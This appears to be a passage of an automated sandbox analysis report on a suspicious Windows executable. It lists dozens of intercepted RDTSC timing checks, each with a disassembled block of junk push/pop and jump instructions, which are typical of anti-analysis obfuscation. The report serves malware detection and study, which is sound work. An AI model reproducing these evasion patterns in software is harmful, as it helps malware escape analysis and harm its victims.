Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DBE30A second address: DBE31A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DBE31A second address: DBE31E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DBE31E second address: DBE326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DBE326 second address: DBE32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DC58DF second address: DC58E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DC5A51 second address: DC5A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jbe 00007F0EC4CB7FC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DC5BC6 second address: DC5BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 ja 00007F0EC4502016h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DC5BD7 second address: DC5BDE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DC5D43 second address: DC5D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0EC4502027h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DC9509 second address: DC953C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F0EC4CB7FD8h 0x0000000a jo 00007F0EC4CB7FCCh 0x00000010 jg 00007F0EC4CB7FC6h 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F0EC4CB7FC6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DC953C second address: DC9540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DC96E9 second address: DC96F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0EC4CB7FC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DC96F5 second address: DC96FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DD5659 second address: DD565D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DD565D second address: DD5661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DE87EF second address: DE87F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: E01BF3 second address: E01BF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: E01BF7 second address: E01C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0EC4CB7FCDh 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F0EC4CB7FD9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: E01C27 second address: E01C48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push edx 0x00000009 jmp 00007F0EC4502022h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: E020AC second address: E020C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FCBh 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F0EC4CB7FC6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: E0220A second address: E0221F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502020h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: E0B004 second address: E0B01F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FD7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: E0B01F second address: E0B023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: E0CB0F second address: E0CB13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: E0CB13 second address: E0CB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jbe 00007F0EC4502032h 0x0000000d jmp 00007F0EC450201Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F0EC4502016h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D70137 second address: 4D7013D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D7013D second address: 4D7014C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D7014C second address: 4D70152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D70152 second address: 4D7016B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D7016B second address: 4D7016F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D7016F second address: 4D70175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D70175 second address: 4D7018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FD1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D7018A second address: 4D7018E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4DA000B second address: 4DA0029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, A164h 0x00000007 mov eax, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e mov ebx, eax 0x00000010 mov cx, D63Dh 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4DA0029 second address: 4DA002F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D3008D second address: 4D3009C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D3009C second address: 4D300C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D300C0 second address: 4D300DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D300DA second address: 4D300E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D300E0 second address: 4D300E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D300E4 second address: 4D3016A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F0EC450201Eh 0x00000011 mov ebp, esp 0x00000013 jmp 00007F0EC4502020h 0x00000018 push dword ptr [ebp+04h] 0x0000001b jmp 00007F0EC4502020h 0x00000020 push dword ptr [ebp+0Ch] 0x00000023 pushad 0x00000024 mov ax, 574Dh 0x00000028 mov edx, esi 0x0000002a popad 0x0000002b push dword ptr [ebp+08h] 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F0EC4502021h 0x00000037 or ecx, 73E2D5D6h 0x0000003d jmp 00007F0EC4502021h 0x00000042 popfd 0x00000043 movzx ecx, di 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D50BAF second address: 4D50BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D50BB3 second address: 4D50BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D50BB9 second address: 4D50BE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 jmp 00007F0EC4CB7FD8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D50BE0 second address: 4D50C44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502026h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e pushfd 0x0000000f jmp 00007F0EC450201Ah 0x00000014 or esi, 733D4B28h 0x0000001a jmp 00007F0EC450201Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 jmp 00007F0EC4502026h 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F0EC450201Ah 0x00000032 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D50C44 second address: 4D50C4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D50795 second address: 4D507D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0EC450201Fh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F0EC4502022h 0x00000012 push eax 0x00000013 pushad 0x00000014 mov ax, 4253h 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007F0EC450201Eh 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D507D8 second address: 4D507DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: 4D507DE second address: 4D507E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D506D1 second address: 4D506F2 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F0EC4CB7FD2h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D506F2 second address: 4D506F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D506F6 second address: 4D506FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D506FC second address: 4D50702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D50702 second address: 4D5073F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F0EC4CB7FD3h 0x00000010 jmp 00007F0EC4CB7FD3h 0x00000015 popfd 0x00000016 mov dh, al 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov edi, ecx 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D50352 second address: 4D50358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D50358 second address: 4D5035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D5035C second address: 4D503E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007F0EC450201Fh 0x0000000f call 00007F0EC4502028h 0x00000014 mov ah, 7Fh 0x00000016 pop ebx 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b mov ch, 6Fh 0x0000001d mov si, bx 0x00000020 popad 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F0EC4502028h 0x0000002b and ax, D3B8h 0x00000030 jmp 00007F0EC450201Bh 0x00000035 popfd 0x00000036 call 00007F0EC4502028h 0x0000003b pop esi 0x0000003c popad 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D60275 second address: 4D6027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D6027B second address: 4D6029B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D6029B second address: 4D6029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D6029F second address: 4D602BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D602BA second address: 4D60309 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 jmp 00007F0EC4CB7FD0h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 movsx edx, si 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007F0EC4CB7FD8h 0x0000001b jmp 00007F0EC4CB7FD5h 0x00000020 popfd 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D60309 second address: 4D6033E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0EC4502020h 0x00000008 jmp 00007F0EC4502025h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ah, bh 0x00000017 push ecx 0x00000018 pop ebx 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D6033E second address: 4D6037C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push ecx 0x00000011 mov di, 53A8h 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0EC4CB7FD6h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D6037C second address: 4D60380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D60380 second address: 4D60386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90F66 second address: 4D90F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90F6C second address: 4D90F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D90F70 second address: 4D90F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D70464 second address: 4D70515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F0EC4CB7FD1h 0x0000000b sbb ax, 3446h 0x00000010 jmp 00007F0EC4CB7FD1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c jmp 00007F0EC4CB7FCCh 0x00000021 pushfd 0x00000022 jmp 00007F0EC4CB7FD2h 0x00000027 add esi, 74627C18h 0x0000002d jmp 00007F0EC4CB7FCBh 0x00000032 popfd 0x00000033 popad 0x00000034 mov eax, dword ptr [ebp+08h] 0x00000037 jmp 00007F0EC4CB7FD6h 0x0000003c and dword ptr [eax], 00000000h 0x0000003f pushad 0x00000040 call 00007F0EC4CB7FCEh 0x00000045 mov ah, C0h 0x00000047 pop edx 0x00000048 movzx ecx, di 0x0000004b popad 0x0000004c and dword ptr [eax+04h], 00000000h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F0EC4CB7FD1h 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D70515 second address: 4D7051B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D7051B second address: 4D70532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FD3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D70532 second address: 4D70536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D50575 second address: 4D505C6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0EC4CB7FD8h 0x00000008 xor ecx, 72DF3508h 0x0000000e jmp 00007F0EC4CB7FCBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 mov edx, eax 0x00000019 push eax 0x0000001a pop edx 0x0000001b popad 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F0EC4CB7FD6h 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D505C6 second address: 4D505D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D505D5 second address: 4D5064B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F0EC4CB7FD7h 0x00000010 pushfd 0x00000011 jmp 00007F0EC4CB7FD8h 0x00000016 or cx, DE88h 0x0000001b jmp 00007F0EC4CB7FCBh 0x00000020 popfd 0x00000021 pop esi 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 jmp 00007F0EC4CB7FCBh 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D5064B second address: 4D5064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D5064F second address: 4D50655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D700AB second address: 4D700C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D700C2 second address: 4D700C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
